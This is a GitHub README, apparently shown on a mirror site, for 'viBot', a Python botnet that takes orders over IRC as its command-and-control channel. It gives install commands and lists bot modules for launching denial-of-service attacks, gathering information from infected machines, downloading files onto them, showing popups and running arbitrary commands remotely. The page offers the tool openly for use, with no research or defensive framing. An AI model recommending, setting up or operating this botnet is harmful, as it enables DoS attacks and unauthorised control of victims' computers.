d3l7a / viBot

A botnet project, that uses IRC as C&C server.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

viBot

A fully native and cross-platform botnet project, that uses IRC as C&C server.

Installation

~$ git clone https://github.com/blackvkng/viBot.git
~$ cd viBot
~$ python2 viBot.py

Usage

irc client: [module] [ARGS]

Available Modules

  • dos module // start a dos attack to target

    • usage
  • info module // get some info about target system

    • usage
      • irc client: info
  • wget module // download files to target from internet

    • usage
      • irc client: wget FILEURL FILE NAME TO SAVE
  • popup module // show a popup message on target system

    • usage
      • irc client: popup TEXT
  • execute module // execute os commands on target and get output of commands

    • usage
      • irc client: execute COMMAND

Screenshots

dos module

alt tag

info module

alt tag

wget module

alt tag

popup module

alt tag

execute module

alt tag

Demo

alt tag

About

A botnet project, that uses IRC as C&C server.

License:MIT License


Languages

Language:Python 100.0%